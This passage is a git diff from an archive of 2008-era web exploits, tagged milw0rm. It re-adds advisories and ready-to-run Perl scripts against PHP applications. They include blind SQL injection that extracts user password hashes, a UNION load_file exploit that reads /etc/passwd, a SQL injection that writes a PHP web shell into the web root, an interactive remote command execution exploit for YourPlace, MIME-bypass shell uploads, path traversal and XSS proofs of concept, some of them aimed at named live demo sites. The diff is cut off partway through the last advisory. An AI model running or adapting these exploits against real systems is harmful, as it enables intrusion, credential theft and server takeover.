+if ($chreq =~ m/(..._)wlw/i) {
+
+ print "[^] Success, using Prefix '$1'\n";
+ $prefix = $1;
+
+} else { 
+ print "[o] Can't find prefix, using 'bb1_'\n";
+ $prefix = "bb1";
+}
+
+print "[+] Getting hash...\n";
+print "[+] Hash: ";
+
+my $curnum = 1;
+
+while($curnum < 32) {
+
+my $false_result = get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=-1/*");
+
+foreach(@charset) {
+
+ my $ascode       = ord($_);
+ my $result       = get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=".$ascode."/*");
+
+ if (length($result) != 0) {
+  if (length($result) != length($false_result)) {
+   print chr($ascode);
+   $curnum++;
+   }
+  }
+ }
+}
+
+print "\n[+] Done!\n";
+
+# EOF
+
+# milw0rm.com [2008-12-21]
diff --git a/platforms/php/webapps/7531.txt b/platforms/php/webapps/7531.txt
index 7dc860907..9ba2dea2a 100755
--- a/platforms/php/webapps/7531.txt
+++ b/platforms/php/webapps/7531.txt
@@ -1,26 +1,26 @@
-#########################################################
----------------------------------------------------------
-Portal Name: ReVou Twitter Clone Arbitrary File Upload Vulnerability
-Version: All version
-Vendor : http://www.revou.com/
-Demo: http://www.revou.com/demo/
-Author : S.W.A.T. , svvateam@yahoo.com
-Vulnerability : wWw.BaTLaGH.CoM
----------------------------------------------------------
-#########################################################
-[Mime Check Bypass]:
-Create A File Called name.php And Fill It As Below:
-----------
-GIF89aP;
-[php_shell_code]
-----------
-Save This File !
-----------
-Go To "My photo" (link: http://www.revou.com/demo/settings/my_photo)
-
-Select Your Shell & Upload !
-----------
-Done ! :-)
----------------------------------
-
-# milw0rm.com [2008-12-21]
+#########################################################
+---------------------------------------------------------
+Portal Name: ReVou Twitter Clone Arbitrary File Upload Vulnerability
+Version: All version
+Vendor : http://www.revou.com/
+Demo: http://www.revou.com/demo/
+Author : S.W.A.T. , svvateam@yahoo.com
+Vulnerability : wWw.BaTLaGH.CoM
+---------------------------------------------------------
+#########################################################
+[Mime Check Bypass]:
+Create A File Called name.php And Fill It As Below:
+----------
+GIF89aP;
+[php_shell_code]
+----------
+Save This File !
+----------
+Go To "My photo" (link: http://www.revou.com/demo/settings/my_photo)
+
+Select Your Shell & Upload !
+----------
+Done ! :-)
+---------------------------------
+
+# milw0rm.com [2008-12-21]
diff --git a/platforms/php/webapps/7532.txt b/platforms/php/webapps/7532.txt
index a80fd8fb8..d7e537a98 100755
--- a/platforms/php/webapps/7532.txt
+++ b/platforms/php/webapps/7532.txt
@@ -1,55 +1,55 @@
-########################## www.BugReport.ir #########################
-#
-#      AmnPardaz Security Research Team
-#
-# Title:  chicomas <=2.0.4 Multiple Vulnerabilities
-# Vendor: http://www.chicomas.com/
-# Demo:   http://demo.opensourcecms.com/chicomas
-# Bug:    Database Information Disclosure, Authorization Weakness, XSS
-# Vulnerable Version: 2.0.4
-# Exploitation: Remote with browser
-# Fix: N/A
-# Original Advisory: http://www.bugreport.ir/index_59.htm
-###################################################################
-
-
-####################
-- Description:
-####################
-
-  ChiCoMaS is free web based Content Management System based on PHP & MySQL with Full featured WYSIWYG TinyMCE editor,
-File management with QuiXplorer, User and group administration to manage access permissions & Backup/Restore with integrated MySqlBackupPro.
-
-####################
-- Vulnerability:
-####################
-
-+-->Dtabase Information Disclosure
-
-POC: http://[URL]/chicomas/config.inc
-
-
-+-->The Latest generated Database backups
-
-POC: http://[URL]/chicomas/backup
-
-
-+-->Cross Site Scripting (XSS). Reflected XSS attack in "index.php" in "q" parameter.
-
-POC: http://[URL]/chicomas/index.php?q="
-
-####################
-- Solution:
-####################
-
-Restrict and grant only trusted users access to the resources. Edit the source code to ensure that inputs are properly sanitized.
-
-####################
-- Credit :
-####################
-AmnPardaz Security Research & Penetration Testing Group
-Contact: admin[4t}bugreport{d0t]ir
-www.BugReport.ir
-www.AmnPardaz.com
-
-# milw0rm.com [2008-12-21]
+########################## www.BugReport.ir #########################
+#
+#      AmnPardaz Security Research Team
+#
+# Title:  chicomas <=2.0.4 Multiple Vulnerabilities
+# Vendor: http://www.chicomas.com/
+# Demo:   http://demo.opensourcecms.com/chicomas
+# Bug:    Database Information Disclosure, Authorization Weakness, XSS
+# Vulnerable Version: 2.0.4
+# Exploitation: Remote with browser
+# Fix: N/A
+# Original Advisory: http://www.bugreport.ir/index_59.htm
+###################################################################
+
+
+####################
+- Description:
+####################
+
+  ChiCoMaS is free web based Content Management System based on PHP & MySQL with Full featured WYSIWYG TinyMCE editor,
+File management with QuiXplorer, User and group administration to manage access permissions & Backup/Restore with integrated MySqlBackupPro.
+
+####################
+- Vulnerability:
+####################
+
++-->Dtabase Information Disclosure
+
+POC: http://[URL]/chicomas/config.inc
+
+
++-->The Latest generated Database backups
+
+POC: http://[URL]/chicomas/backup
+
+
++-->Cross Site Scripting (XSS). Reflected XSS attack in "index.php" in "q" parameter.
+
+POC: http://[URL]/chicomas/index.php?q="
+
+####################
+- Solution:
+####################
+
+Restrict and grant only trusted users access to the resources. Edit the source code to ensure that inputs are properly sanitized.
+
+####################
+- Credit :
+####################
+AmnPardaz Security Research & Penetration Testing Group
+Contact: admin[4t}bugreport{d0t]ir
+www.BugReport.ir
+www.AmnPardaz.com
+
+# milw0rm.com [2008-12-21]
diff --git a/platforms/php/webapps/7537.txt b/platforms/php/webapps/7537.txt
index 1122751f9..d2fe0074f 100755
--- a/platforms/php/webapps/7537.txt
+++ b/platforms/php/webapps/7537.txt
@@ -1,36 +1,36 @@
-################## Piker #######################################
-#
-#
-#    BLOG v1.55B Arbitrary File Upload Vulnerability
-#
-
-#
-#    Affected software: BLOG v1.55B prior versions can be affected
-
-#    Vendor: http://sourceforge.net/projects/kafooeyblog/
-#    Risk: High
-#
-################################################################
-
-#
-
-#    http://[target]/[path]/lib/image_upload.php
-#
-#   This script only checks if the file you are uploading
-#   is not a text/plain file so you can upload whatever
-#   you want, for example a PHP Shell.
-#
-
-#   
-################################################################
-#
-#         Found by Piker [piker0x90(at)gmail(dot)com]
-#
-#            D.O.M Labs - Security Researchers
-#                   www.domlabs.org
-
-#
-#
-################################################################
-
-# milw0rm.com [2008-12-21]
+################## Piker #######################################
+#
+#
+#    BLOG v1.55B Arbitrary File Upload Vulnerability
+#
+
+#
+#    Affected software: BLOG v1.55B prior versions can be affected
+
+#    Vendor: http://sourceforge.net/projects/kafooeyblog/
+#    Risk: High
+#
+################################################################
+
+#
+
+#    http://[target]/[path]/lib/image_upload.php
+#
+#   This script only checks if the file you are uploading
+#   is not a text/plain file so you can upload whatever
+#   you want, for example a PHP Shell.
+#
+
+#   
+################################################################
+#
+#         Found by Piker [piker0x90(at)gmail(dot)com]
+#
+#            D.O.M Labs - Security Researchers
+#                   www.domlabs.org
+
+#
+#
+################################################################
+
+# milw0rm.com [2008-12-21]
diff --git a/platforms/php/webapps/7541.pl b/platforms/php/webapps/7541.pl
index b7e80488d..d00115dcc 100755
--- a/platforms/php/webapps/7541.pl
+++ b/platforms/php/webapps/7541.pl
@@ -1,114 +1,114 @@
-#!/usr/bin/perl
-################################
-##    Coded by Piker [piker(dot)ther00t(at)gmail(dot)com]
-##      D.O.M Team
-## piker,ka0x,an0de,xarnuz
-## 2008 Security Researchers
-################################
-##
-## RSS Simple News Remote SQL Injection Exploit
-## http://sourceforge.net/projects/rss-simple-news/
-##
-##   This exploit tries to read an
-##   arbitrary file.
-##
-##   It needs magic_quotes_gpc=off
-##
-################################
-
-# piker@domlabs:~/advisories$ perl rss.pl http://localhost/rss /etc/passwd
-#[+] File HEX: 0x2f6574632f706173737764
-#[+] Host: http://localhost/rss/
-#[+] File content:
-#daemon:x:1:1:daemon:/usr/sbin:/bin/sh
-#bin:x:2:2:bin:/bin:/bin/sh
-#sys:x:3:3:sys:/dev:/bin/sh
-#sync:x:4:65534:sync:/bin:/bin/sync
-#games:x:5:60:games:/usr/games:/bin/sh
-# [...]
-#[+] EOF
-#
-#
-
-
-use LWP::UserAgent;
-
-open(FILE, ">&STDOUT");
-
-my $host = $ARGV[0];
-my $file = $ARGV[1];
-
-die &_USO unless $ARGV[1];
-
-sub _USO
-{
-    die "
-    RSS Simple News Remote Sql Injection Exploit
-
-    This exploit tries to read an
-    arbitrary file.
-
-    It needs magic_quotes_gpc=off
-
-    usage: ./$0  
-    ex: ./$0 http://localhost/rss/ /etc/passwd
-
-    ";
-}
-
-my $ua = LWP::UserAgent->new() or die;
-$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
-
-my $tmp="0x";
-my $tmp2;
-
-foreach my $c (split(//, $file)){
-    $tmp2 = sprintf ("%x", ord($c));
-    $tmp .= $tmp2;
-}
-
-print FILE "[+] File HEX: ".$tmp."\n";
-
-if ($host !~ /\/$/){ $host .= "/"; }
-
-print FILE "[+] Host: ".$host."\n";
-
-my $req = HTTP::Request->new(GET => $host."news.php?pid=-1' union select 1,2,3,4,CONCAT(0x3c46494c453e,load_file(".$tmp."),0x3c46494c453e),6 and 'a'='a");
-my $res = $ua->request($req);
-my $con = $res->content;
-
-my $ok = 0;
-open (OUT, ">result.txt");
-
-if ($res->is_success){
-    foreach my $linea (split(/\n/, $con)){
-        if($ok == 1){
-            if ($linea !~ //){
-                print FILE $linea."\n";
-        print OUT $linea."\n";
-            }else{
-                print FILE "\n[+] EOF\n";
-        print "\n[+] File saved into 'result.txt'\n";
-                goto salida;
-            }
-        }
-        if($linea =~ //i && $ok == 0){
-            $ok = 1;
-            print FILE "[+] File content: \n";
-        }
-    }
-    salida:
-    if ($ok == 0){
-        print FILE "[-] Exploit Failed!\n";
-    }      
-}
-else{
-    print FILE "[-] Exploit Failed!\n";
-}
-
-close(FILE);
-close(OUT);
-
-#EOF
-
-# milw0rm.com [2008-12-22]
+#!/usr/bin/perl
+################################
+##    Coded by Piker [piker(dot)ther00t(at)gmail(dot)com]
+##      D.O.M Team
+## piker,ka0x,an0de,xarnuz
+## 2008 Security Researchers
+################################
+##
+## RSS Simple News Remote SQL Injection Exploit
+## http://sourceforge.net/projects/rss-simple-news/
+##
+##   This exploit tries to read an
+##   arbitrary file.
+##
+##   It needs magic_quotes_gpc=off
+##
+################################
+
+# piker@domlabs:~/advisories$ perl rss.pl http://localhost/rss /etc/passwd
+#[+] File HEX: 0x2f6574632f706173737764
+#[+] Host: http://localhost/rss/
+#[+] File content:
+#daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+#bin:x:2:2:bin:/bin:/bin/sh
+#sys:x:3:3:sys:/dev:/bin/sh
+#sync:x:4:65534:sync:/bin:/bin/sync
+#games:x:5:60:games:/usr/games:/bin/sh
+# [...]
+#[+] EOF
+#
+#
+
+
+use LWP::UserAgent;
+
+open(FILE, ">&STDOUT");
+
+my $host = $ARGV[0];
+my $file = $ARGV[1];
+
+die &_USO unless $ARGV[1];
+
+sub _USO
+{
+    die "
+    RSS Simple News Remote Sql Injection Exploit
+
+    This exploit tries to read an
+    arbitrary file.
+
+    It needs magic_quotes_gpc=off
+
+    usage: ./$0  
+    ex: ./$0 http://localhost/rss/ /etc/passwd
+
+    ";
+}
+
+my $ua = LWP::UserAgent->new() or die;
+$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
+
+my $tmp="0x";
+my $tmp2;
+
+foreach my $c (split(//, $file)){
+    $tmp2 = sprintf ("%x", ord($c));
+    $tmp .= $tmp2;
+}
+
+print FILE "[+] File HEX: ".$tmp."\n";
+
+if ($host !~ /\/$/){ $host .= "/"; }
+
+print FILE "[+] Host: ".$host."\n";
+
+my $req = HTTP::Request->new(GET => $host."news.php?pid=-1' union select 1,2,3,4,CONCAT(0x3c46494c453e,load_file(".$tmp."),0x3c46494c453e),6 and 'a'='a");
+my $res = $ua->request($req);
+my $con = $res->content;
+
+my $ok = 0;
+open (OUT, ">result.txt");
+
+if ($res->is_success){
+    foreach my $linea (split(/\n/, $con)){
+        if($ok == 1){
+            if ($linea !~ //){
+                print FILE $linea."\n";
+        print OUT $linea."\n";
+            }else{
+                print FILE "\n[+] EOF\n";
+        print "\n[+] File saved into 'result.txt'\n";
+                goto salida;
+            }
+        }
+        if($linea =~ //i && $ok == 0){
+            $ok = 1;
+            print FILE "[+] File content: \n";
+        }
+    }
+    salida:
+    if ($ok == 0){
+        print FILE "[-] Exploit Failed!\n";
+    }      
+}
+else{
+    print FILE "[-] Exploit Failed!\n";
+}
+
+close(FILE);
+close(OUT);
+
+#EOF
+
+# milw0rm.com [2008-12-22]
diff --git a/platforms/php/webapps/7542.txt b/platforms/php/webapps/7542.txt
index 90f1eb8e1..036c0716e 100755
--- a/platforms/php/webapps/7542.txt
+++ b/platforms/php/webapps/7542.txt
@@ -1,37 +1,37 @@
-#############################################################################################
-[+] Text Lines Rearrange Script (download.php filename) File
-Disclosure Vulnerability
-[+] Discovered By SirGod
-[+] Visit : www.h4cky0u.org
-[+] Greetz : All my friends
-#############################################################################################
-
- [+] File Disclosure Vulnerability
-
-  Vulnerable Code in download.php :
-
------------------------------------------------------
-
-if(file_exists($filename))
-{
-	$fp=fopen($filename,"r");
-	$content=fread($fp,filesize($filename));
-	fclose($fp);
-	
-------------------------------------------------------	
-	
- PoC :
-
-  http://[target]/[path]/download.php?filename=[Local File]
-
- Example :
-
-  http://[target]/[path]/download.php?filename=index.php
-
- Live Demo :
-
-  http://www.rightscripts.com/listrearrange/download.php?filename=index.php
-
-#############################################################################################
-
-# milw0rm.com [2008-12-22]
+#############################################################################################
+[+] Text Lines Rearrange Script (download.php filename) File
+Disclosure Vulnerability
+[+] Discovered By SirGod
+[+] Visit : www.h4cky0u.org
+[+] Greetz : All my friends
+#############################################################################################
+
+ [+] File Disclosure Vulnerability
+
+  Vulnerable Code in download.php :
+
+-----------------------------------------------------
+
+if(file_exists($filename))
+{
+	$fp=fopen($filename,"r");
+	$content=fread($fp,filesize($filename));
+	fclose($fp);
+	
+------------------------------------------------------	
+	
+ PoC :
+
+  http://[target]/[path]/download.php?filename=[Local File]
+
+ Example :
+
+  http://[target]/[path]/download.php?filename=index.php
+
+ Live Demo :
+
+  http://www.rightscripts.com/listrearrange/download.php?filename=index.php
+
+#############################################################################################
+
+# milw0rm.com [2008-12-22]
diff --git a/platforms/php/webapps/7543.txt b/platforms/php/webapps/7543.txt
index 23b60b232..ad53bc140 100755
--- a/platforms/php/webapps/7543.txt
+++ b/platforms/php/webapps/7543.txt
@@ -1,19 +1,19 @@
- _____   ____   __   __     _       ____        ____    ____ 
-|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
-  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
-  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
-  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
-
-Wordpress Plugin Page Flip Image Gallery <= 0.2.2 Remote File Disclosure Vulnerability
-D : http://downloads.wordpress.org/plugin/page-flip-image-gallery.0.2.2.zip
-Poc : 
- /wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=../../../../../../../../../../../etc/passwd%00123
-
-        ____           _           _           __  __ 
-       / ___|   ___   | |       __| |         |  \/  |
-      | |  _   / _ \  | |      / _` |         | |\/| |
-      | |_| | | (_) | | |___  | (_| |         | |  | |
-       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
-                                      |_____|         
-
-# milw0rm.com [2008-12-22]
+ _____   ____   __   __     _       ____        ____    ____ 
+|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
+  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
+  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
+  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
+
+Wordpress Plugin Page Flip Image Gallery <= 0.2.2 Remote File Disclosure Vulnerability
+D : http://downloads.wordpress.org/plugin/page-flip-image-gallery.0.2.2.zip
+Poc : 
+ /wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=../../../../../../../../../../../etc/passwd%00123
+
+        ____           _           _           __  __ 
+       / ___|   ___   | |       __| |         |  \/  |
+      | |  _   / _ \  | |      / _` |         | |\/| |
+      | |_| | | (_) | | |___  | (_| |         | |  | |
+       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
+                                      |_____|         
+
+# milw0rm.com [2008-12-22]
diff --git a/platforms/php/webapps/7544.txt b/platforms/php/webapps/7544.txt
index baa36d428..16b7d5384 100755
--- a/platforms/php/webapps/7544.txt
+++ b/platforms/php/webapps/7544.txt
@@ -1,134 +1,134 @@
-#!/usr/bin/perl
-
-=about
-
- Pligg 9.9.5 Beta Perl exploit
- 
- AUTHOR
-	discovered & written by Ams
-	ax330d [doggy] gmail [dot] com
-
- VULN. DESCRIPTION:
-	Vulnerability hides in 'evb/check_url.php'
-	unfiltered $_GET['url'] parameter.
-	Actually, it has filtration.
-	Filtration strips tags and converts html
-	special chars , but it is not enough,
-	because we can use MySQLs CHAR() function
-	to convert shell to allowed chars.
- 
- EXPLOIT WORK:
-	Firtsly, exploit tryes to get full server
-	path, but if not succeeded, then it will brute it.
-	If path has been found then exploit will try
-	to upload tiny shell via SQl-Injection.
- 
- REQUIREMENTS:
-	MySQL should be able to write to file.
-	Know full server path to portal.
-	magiq_quotes_gpc=off
-    
-=cut
-
-use strict;
-use warnings;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-
-Banner();
-
-$| = 1;
-my $expl_url  = shift or Usage();
-my $serv_path = shift || '';
-
-my $spider = LWP::UserAgent->new;
-$spider->timeout( 9 );
-$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
-
-my $def_shell = '/libs/manager.php';
-my $shell     = q();
-my $sql_shell = join ',', map { ord } split //, $shell;
-
-my @paths = qw(
-	/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts
-	/home/www  /home/httpd/vhosts
-	/usr/local/apache/htdocs
-	/www/htdocs
-);
-
-exploit( $expl_url );
-
-sub exploit {
-	
-	$_ = shift;
-	print "\n\tExploiting: $_";
-	
-	my ( $packet, $rcvd, $injection );
-	my ( $prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
-	
-	my $req = GET "$prot://$host$path/evb/check_url.php";
-	my $res = $spider->request( $req );
-	$serv_path = $res->content =~ /template\s+in\s+(.*?)config\.php/
-		? $1
-		: $serv_path;
-	
-	if ( $serv_path ne '' ) {
-		
-		print "\n\tFound server path: $serv_path";
-		
-		chomp( $serv_path );
-		$injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$def_shell'--  ";
-		$req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection );
-		$res = $spider->request( $req );
-		
-	} else {
-		
-		print "\n\tUnable to find path, starting bruteforce...\n";
-		
-		for $serv_path ( @paths ) {
-			
-			printf "\tTrying: $serv_path$path$def_shell %s\r", '  ' x 10;
-			
-			chomp( $serv_path );
-			$injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$path$def_shell'--  ";
-			$req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection );
-			$res = $spider->request( $req );
-		}
-	}
-	
-	#	Checking for shell presence
-	$req = HEAD "http://$host$path$def_shell";
-	$res = $spider->request( $req );
-
-	if ( $res->status_line =~ /200/ ) {
-		print "\n\tExploited: http://$host$path$def_shell\n\n";
-	} else {
-		print "\n\tExploiting failed\n\n";
-	}
-	
-}
-
-#	Light wheel...
-sub Url_Encode {
-	$_ = shift;
-	s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
-	return $_;
-}
-
-sub Usage {
-	print "\n\tUsage:\t$0 http://site.com [full server path]
-	
-	Example:
-		$0 http://localhost/ /var/www/htdocs
-		$0 http://localhost/\n\n";
-	exit;
-}
-
-sub Banner {
-	print "
-	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-	  Pligg 9.9.5 Beta Perl exploit
-	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
-}
-
-# milw0rm.com [2008-12-22]
+#!/usr/bin/perl
+
+=about
+
+ Pligg 9.9.5 Beta Perl exploit
+ 
+ AUTHOR
+	discovered & written by Ams
+	ax330d [doggy] gmail [dot] com
+
+ VULN. DESCRIPTION:
+	Vulnerability hides in 'evb/check_url.php'
+	unfiltered $_GET['url'] parameter.
+	Actually, it has filtration.
+	Filtration strips tags and converts html
+	special chars , but it is not enough,
+	because we can use MySQLs CHAR() function
+	to convert shell to allowed chars.
+ 
+ EXPLOIT WORK:
+	Firtsly, exploit tryes to get full server
+	path, but if not succeeded, then it will brute it.
+	If path has been found then exploit will try
+	to upload tiny shell via SQl-Injection.
+ 
+ REQUIREMENTS:
+	MySQL should be able to write to file.
+	Know full server path to portal.
+	magiq_quotes_gpc=off
+    
+=cut
+
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+
+Banner();
+
+$| = 1;
+my $expl_url  = shift or Usage();
+my $serv_path = shift || '';
+
+my $spider = LWP::UserAgent->new;
+$spider->timeout( 9 );
+$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
+
+my $def_shell = '/libs/manager.php';
+my $shell     = q();
+my $sql_shell = join ',', map { ord } split //, $shell;
+
+my @paths = qw(
+	/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts
+	/home/www  /home/httpd/vhosts
+	/usr/local/apache/htdocs
+	/www/htdocs
+);
+
+exploit( $expl_url );
+
+sub exploit {
+	
+	$_ = shift;
+	print "\n\tExploiting: $_";
+	
+	my ( $packet, $rcvd, $injection );
+	my ( $prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
+	
+	my $req = GET "$prot://$host$path/evb/check_url.php";
+	my $res = $spider->request( $req );
+	$serv_path = $res->content =~ /template\s+in\s+(.*?)config\.php/
+		? $1
+		: $serv_path;
+	
+	if ( $serv_path ne '' ) {
+		
+		print "\n\tFound server path: $serv_path";
+		
+		chomp( $serv_path );
+		$injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$def_shell'--  ";
+		$req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection );
+		$res = $spider->request( $req );
+		
+	} else {
+		
+		print "\n\tUnable to find path, starting bruteforce...\n";
+		
+		for $serv_path ( @paths ) {
+			
+			printf "\tTrying: $serv_path$path$def_shell %s\r", '  ' x 10;
+			
+			chomp( $serv_path );
+			$injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$path$def_shell'--  ";
+			$req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection );
+			$res = $spider->request( $req );
+		}
+	}
+	
+	#	Checking for shell presence
+	$req = HEAD "http://$host$path$def_shell";
+	$res = $spider->request( $req );
+
+	if ( $res->status_line =~ /200/ ) {
+		print "\n\tExploited: http://$host$path$def_shell\n\n";
+	} else {
+		print "\n\tExploiting failed\n\n";
+	}
+	
+}
+
+#	Light wheel...
+sub Url_Encode {
+	$_ = shift;
+	s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
+	return $_;
+}
+
+sub Usage {
+	print "\n\tUsage:\t$0 http://site.com [full server path]
+	
+	Example:
+		$0 http://localhost/ /var/www/htdocs
+		$0 http://localhost/\n\n";
+	exit;
+}
+
+sub Banner {
+	print "
+	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+	  Pligg 9.9.5 Beta Perl exploit
+	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
+}
+
+# milw0rm.com [2008-12-22]
diff --git a/platforms/php/webapps/7545.txt b/platforms/php/webapps/7545.txt
index 328f37a0c..155909b8e 100755
--- a/platforms/php/webapps/7545.txt
+++ b/platforms/php/webapps/7545.txt
@@ -1,236 +1,236 @@
-[START]
-
-############################################################################################################################################
-[0x01] Informations:
-
-Script         : YourPlace 0.5 (beta 1)
-Download       : http://www.hotscripts.com/jump.php?listing_id=80545&jump_type=1
-Vulnerability  : DB Disclosure / Arbitrary Data Saving (RCE EXPLOIT) / Arbitrary File Upload / PHPInfo Disclosure / User Change Account
-Author         : Osirys
-Contact        : osirys[at]live[dot]it
-Website        : http://osirys.org
-Notes          : Proud to be Italian
-Greets:        : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
-
-* This script has also other vulnerability. Here you can find just the major ones !
-  I wrote a simple RCE Exploit also.
-
-
-############################################################################################################################################
-[0x02] Bug: [Database Disclosure]
-######
-
-Vulnerable file is: /[path]/user/info/users.txt
-
-This script uses a .txt file to store usernames and passwords.
-
-### [!] EXPLOIT:
-                 1) Go at: /[path]/user/info/users.txt
-                 2) Get username and password !
-                 ex: osirys	$1$H9mfzCTo$gbuasEowB1agfEqWolcGR.
-                     username   password crypted with crypt function
-
-
-############################################################################################################################################
-[0x03] Bug: [Arbitrary Data Saving] ## RCE EXPLOIT !!
-######
-
-Bugged file is: /[path]/internettoolbar/edit.php
-
-To exploit this vulnerability, we must be logged in.
-
-[CODE]
-
-				$fav5_url = $_POST['fav5_url'];
-				$fav1_name = $_POST['fav5_name'];
-				
-				$write = "";
-									
-				$write = str_replace('$','$',$write);
-				$fp = fopen("../user/internettoolbar/index.php", "w+");
-				$fw = fwrite($fp, $write);
-
-[/CODE]
-
-All the $fav variables come from POST. There is any cheek on what the user put in the form of $fav vars.
-Then the script will save the value of this vars in /[path]/user/internettoolbar/index.php.
-So we can put an evil php code ;)
-I wrote a simple exploit, a simple proof of concept, change it in your own way ;)
-This exploit can be adapted to your own needs.
-
-############################################################
-##########################################
-## Remote Command Execution Perl Exploit
-
-[code]
-
-#!/usr/bin/perl
-
-use HTTP::Request;
-use LWP::UserAgent;
-
-my $path      = "/internettoolbar/edit.php";
-my $exec_path = "/user/internettoolbar/index.php";
-my $c0de      = "lol.it';?>new;
-my $post = $ua->post($url,
-                          [
-                            fav1_url => $c0de,
-                            do       => submit
-                          ]);
-
-if ($post->is_success) {
-    print "[+] Commands:\n";
-    print "    exit         -> quit the exploit \n";
-    print "    your command -> exec your cmd    \n";
-    &exec_cmd;
-}
-else {
-    print "[-] Can't write hell code !\n";
-    exit(0);
-}
-
-sub exec_cmd {
-    print "shell[Osirys]$>\n";
-    $cmd = ;
-    $cmd !~ /exit/ || die "[-] Quitting ..\n";
-    $exec_url = ($host.$exec_path."?cmd=".$cmd);
-    $re = query($exec_url);
-    if ($re =~ /\?>(.*)/) {
-        print "[*] $1\n";
-        &exec_cmd;
-    }
-    else {
-        print "[-] Undefined output or bad cmd !\n";
-        &exec_cmd;
-    }
-}
-
-sub query() {
-    $link = $_[0];
-    my $req = HTTP::Request->new(GET => $link);
-    my $ua = LWP::UserAgent->new();
-    $ua->timeout(4);
-    my $response = $ua->request($req);
-    return $response->content;
-}
-
-sub cheek() {
-    my $host = $_[0];
-    if ($host =~ /http:\/\/(.*)/) {
-        return 1;
-    }
-    else {
-        return 0;
-    }
-}
-
-sub banner {
-    print "\n".
-          "  ============================ \n".
-          "     YourPlace RCE Exploit     \n".
-          "      Coded by Osirys          \n".
-          "      osirys[at]live[dot]it    \n".
-          "      Proud to be italian      \n".
-          "  ============================ \n\n";
-}
-
-sub help() {
-    my $error = $_[0];
-    if ($error == -1) {
-        &banner;
-        print "\n[-] Cheek that you typed the hostname address and the command to execute !\n";
-    }
-    elsif ($error == -2) {
-        &banner;
-        print "\n[-] Bad hostname address !\n";
-    }
-    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
-    exit(0);
-}
-
-[/CODE]
-
-
-############################################################################################################################################
-[0x04] Bug: [Arbitrary File Upload]
-######
-
-Bugged file is: /[path]/apps/standard/upload.php
-
-To upload our local file we must be logged in. Then we can upload any file.
-The bug here is to allow user to upload file of any extensions, in fact there isn't any extension cheek.
-
-
-### [!] EXPLOIT: 
-                 1) Go at: /[path]/apps/standard/upload.php
-                 2) Upload your local file.
-                 3) Cheek it here: /[path]/user/uploads/your_file.your_ext
-
-
-############################################################################################################################################
-[0x05] Bug: [PHPInfo Disclosure]
-######
-
-Vulnerable file is: /[path]/user/uploads/phpinfo.php
-
-
-### [!] EXPLOIT:
-                 1) Go at /[path]/user/uploads/phpinfo.php
-                 2) Get php information
-
-
-############################################################################################################################################
-[0x06] Bug: [User Change Account]
-######
-
-Bugged file is: /[path]/login/register.php
-
-[CODE]
-
-if (isset ($_POST['submit'])) {
-	$fp = fopen ( '../user/info/users.txt', 'w+' );
-	
-	if ($fp){
-		$data = $_POST['username']."\t".crypt($_POST['password'])."\r\n";
-		fwrite ( $fp, $data );
-		fclose ( $fp );
-		echo ":-)";
-	}
-
-[/CODE]
-
-Registering a new user, the old one will be deleted.
-
-
-### [!] EXPLOIT: Go at: /[path]/login/register_form.php
-                 Register your new user
-
-
-############################################################################################################################################
-
-[/END]
-
-# milw0rm.com [2008-12-22]
+[START]
+
+############################################################################################################################################
+[0x01] Informations:
+
+Script         : YourPlace 0.5 (beta 1)
+Download       : http://www.hotscripts.com/jump.php?listing_id=80545&jump_type=1
